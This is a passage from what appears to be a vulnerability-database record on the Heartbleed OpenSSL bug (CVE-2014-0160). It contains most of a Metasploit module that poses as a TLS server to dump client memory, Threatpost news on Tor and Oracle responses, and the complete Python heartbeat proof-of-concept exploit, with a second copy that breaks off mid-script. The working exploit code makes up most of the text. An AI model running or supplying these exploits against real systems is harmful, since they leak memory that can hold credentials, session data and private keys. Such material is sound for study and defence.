do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n if level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of each half of the secret\n # string. If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}], "threatpost": [{"lastseen": "2018-10-06T22:58:59", "bulletinFamily": "info", "description": "The Tor Project has begun blacklisting exit nodes vulnerable to the [Heartbleed vulnerability in OpenSSL](<https://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>).\n\nResearcher Collin Mulliner, with the Systems Security Lab at Northeastern University in Boston, published the results of an experiment he conducted using a publicly disclosed Heartbleed proof-of-concept exploit against 5,000 Tor nodes. Mulliner said that [1,045 nodes, or a little more than 20 percent, were vulnerable to the bug](<http://www.mulliner.org/blog/blosxom.cgi/security/torbleed.html>).\n\nMulliner said only Tor exit nodes were leaking plaintext user traffic, including host names, credentials and web content. Mulliner conducted his experiment for three days last Friday through Sunday, and his results are a point-in-time snapshot. A post yesterday from Tor Project leader Roger Dingledine on the Tor mailing list said that [380 vulnerable exit keys were being rejected](<https://lists.torproject.org/pipermail/tor-relays/2014-April/004336.html>).\n\nHeartbleed was publicly reported on April 7. The vulnerability lies in the heartbeat function in OpenSSL 1.0.1 to 1.0.1f [which publicly leaks 64 KB of memory](<https://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309>) to any client or server pinging a web server running the vulnerable crypto library. The memory leaks can disclose in plaintext anything from user credentials to private server keys if the attack is repeated enough. Several researchers have already managed to [retrieve private SSL keys](<http://threatpost.com/stealing-private-ssl-keys-using-heartbleed-difficult-not-impossible/105413>) in an online challenge from vendor CloudFlare. Speculation is that intelligence agencies and/or hackers may have been exploiting it since November. Mulliner said he did not try to extract private keys from Tor, nor did he think it was possible.\n\nTor promises anonymity to its users by using proxies to pass encrypted traffic from source to destination. Mulliner said he used a random list of 5,000 Tor nodes from the Dan.me.uk website for his research; of the 1,045 vulnerable nodes he discovered, he recovered plaintext traffic that included Tor plaintext announcements, but a significant number of nodes leaked user traffic in the clear.\u201d\n\n\u201cI found a significant amount of plaintext user traffic, complete Web traffic, session IDs; everything you would find if you ran Heartbleed against a normal Web server,\u201d Mulliner said.\n\nHeartbleed saves attackers the work of setting up their own exit node and waiting for traffic to pass through it. Using Heartbleed, all a hacker would have to do is query a vulnerable exit node to obtain traffic, Mulliner said.\n\nDingledine yesterday published the first list of rejected exit nodes and said those nodes will not be allowed back on the network.\n\n\u201cI thought for a while about trying to keep my list of fingerprints up-to-date (i.e. removing the !reject line once they\u2019ve upgraded their openssl), but on the other hand, if they were still vulnerable as of yesterday, I really don\u2019t want this identity key on the Tor network even after they\u2019ve upgraded their OpenSSL,\u201d Dingledine wrote. He added that he hopes others will add to this list as other vulnerable relays are discovered.\n\nTor acknowledged [some of its components were vulnerable to Heartbleed](<https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>) in a post to its blog on April 7.\n\nMulliner said it was a fairly straightforward process to write a script to run a Heartbleed proof of concept.\n\n\u201cAnybody who can get the Python script can play around with it,\u201d Mulliner said, adding that there are likely fewer vulnerable Tor nodes now than when he ran his scans last week since some have likely been patched and Tor has begun blacklisting. \u201cThe data is dated, but it\u2019s a good picture of that point in time.\u201d\n", "modified": "2014-04-22T15:45:23", "published": "2014-04-17T11:40:41", "id": "THREATPOST:15624C23F5CD5AC1029501D08A99D294", "href": "https://threatpost.com/tor-begins-blacklisting-exit-nodes-vulnerable-to-heartbleed/105519/", "type": "threatpost", "title": "Tor Blacklisting Exit Nodes Vulnerable to Heartbleed Bug", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:59:00", "bulletinFamily": "info", "description": "Software maker and database management company Oracle yesterday released its quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). The release resolves more than 100 security vulnerabilities, many of which received high common vulnerability scoring system base scores and should be applied as soon as possible.\n\nProducts affected by the patch include but are not limited to Oracle Database, Fusion Middleware, Hyperion, Supply Chain Product Suite, iLearning, PeopleSoft Enterprise, Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, and Oracle MySQL.\n\nLast week, Oracle released a [list of products](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) affected by the [Heartbleed OpenSSL vulnerability](<http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>), as well as their current status with respect to vulnerable versions of the encryption library.\n\nAmong the patches that should be prioritized are two bugs in Oracle\u2019s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there.\n\nThe update also closes off 20 Fusion middleware vulnerabilities, the most critical of which is remotely exploitable without authentication and could lead to a wide compromise of the WebLogic Server.\n\nAlso included in its April release are 37 Java vulnerabilities. Four of those received the highest possible CVSS ratings of 10.0. Oracle urges all user \u2013 home users in particular \u2013 to apply these patches immediately.\n\nThe patch update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. The most severe of these vulnerabilities could affect certain versions of Oracle Global Secure Desktop.\n\n\u201cDue to the relative severity of a number of the vulnerabilities fixed in this Critical Patch Update, Oracle strongly recommends that customers apply this Critical Patch Update as soon as possible,\u201d wrote Oracle security assurance manager, Eric Maurice.\n\nEarlier this month, [researchers from Security Explorations disclosed more than two dozen outstanding issues with the company\u2019s Java Cloud Service platform](<http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190>). There is no mention of that line of products in the update, so it appears that the company did not resolve those bugs. At the beginning or March, researchers at the London-based computer security firm Portcullis claimed to uncover[ four bugs in the Oracle\u2019s Demantra Value Chain Planning suite of software](<http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574>). The update makes no mention of these vulnerabilities either.\n", "modified": "2014-04-21T14:36:06", "published": "2014-04-16T12:32:06", "id": "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "href": "https://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494/", "type": "threatpost", "title": "April 2014 Oracle Critical Patch Update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:58:58", "bulletinFamily": "info", "description": "As the dominoes continue to fall around Heartbleed, Oracle is doing its best to keep users apprised of its ongoing efforts to patch software that may be vulnerable to the OpenSSL vulnerability.\n\nIn a document [updated early this morning](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) Oracle gave its customers five separate updates regarding:\n\n * Products that were never vulnerable to Heartbleed\n * Products still under investigation that may be vulnerable to Heartbleed\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have fixes\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have no current fixes\n * Products that do not use OpenSSL and\n * An update regarding Oracle Cloud\n\nMost of the updates given by Oracle refer to Heartbleed not by its buzzy nickname but by its official Common Vulnerabilities and Exposures number, [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>).\n\nMore than 100 products \u2013 managers, gateways, switches and systems, etc. \u2013 were ruled safe by the company, mostly because they don\u2019t run a version of OpenSSL that was ruled vulnerable to the CVE-2014-0160 instability.\n\nElsewhere developers at the company are reportedly still looking into whether or not 10 different products, notably those that use the company\u2019s Art Technology Group and Corente technology, are vulnerable to Heartbleed. Information for those products is still forthcoming.\n\nFourteen products, mostly those that rely on MySQL, Oracle\u2019s Big Data Appliance and its Mobile Security Suite have been patched so far. The company is posting as soon as each product is remedied and then linking to their respective support sections.\n\nConversely, 11 products, including some builds of Java ME and five iterations of its Communications suite, are branded as \u201clikely\u201d vulnerable but no fixes are yet available.\n\nLastly, the company claims its still unsure of how Heartbleed affects products that rely on its Cloud computing technology but that it\u2019s \u201cinvestigating the implications of this issue across the Oracle stack.\u201d The bulk of cloud service products, including its Public Cloud, Managed Cloud Services and Cloud for Industry, are free of vulnerabilities but other services have been deemed \u201cunder investigation.\u201d\n\nOracle points out that the document should be considered as fluid and will continue to be updated as fixes and further mitigation instructions become available. Until then the patch and vulnerability information should be taken on an \u201cAS-IS\u201d basis.\n\nEnd users who deploy a variety of Oracle products on their networks have no doubt had their hands full with patches as of late. The Heartbleed update comes [just a few days after](<http://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494>) the company\u2019s regularly scheduled quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). That update resolved more than 100 security issues across Java SE, along with the company\u2019s Database and Fusion Middleware.\n", "modified": "2014-04-21T17:55:42", "published": "2014-04-21T13:55:42", "id": "THREATPOST:9012A325F248438FAC15C4FB3082A796", "href": "https://threatpost.com/oracle-gives-heartbleed-update-patches-14-products/105576/", "type": "threatpost", "title": "Oracle Gives Heartbleed Update, Patches 14 Products", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-19T11:11:23", "bulletinFamily": "exploit", "description": "This memory disclosure exploit is a quick and dirty demonstration of the TLS heartbeat extension vulnerability.", "modified": "2014-04-08T00:00:00", "published": "2014-04-08T00:00:00", "id": "1337DAY-ID-22114", "href": "https://0day.today/exploit/description/22114", "type": "zdt", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "sourceData": "#!/usr/bin/python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n \r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22114"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:50", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-08T00:00:00", "published": "2014-04-08T00:00:00", "href": "https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html", "id": "PACKETSTORM:126070", "type": "packetstorm", "title": "Heartbleed Proof Of Concept", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: 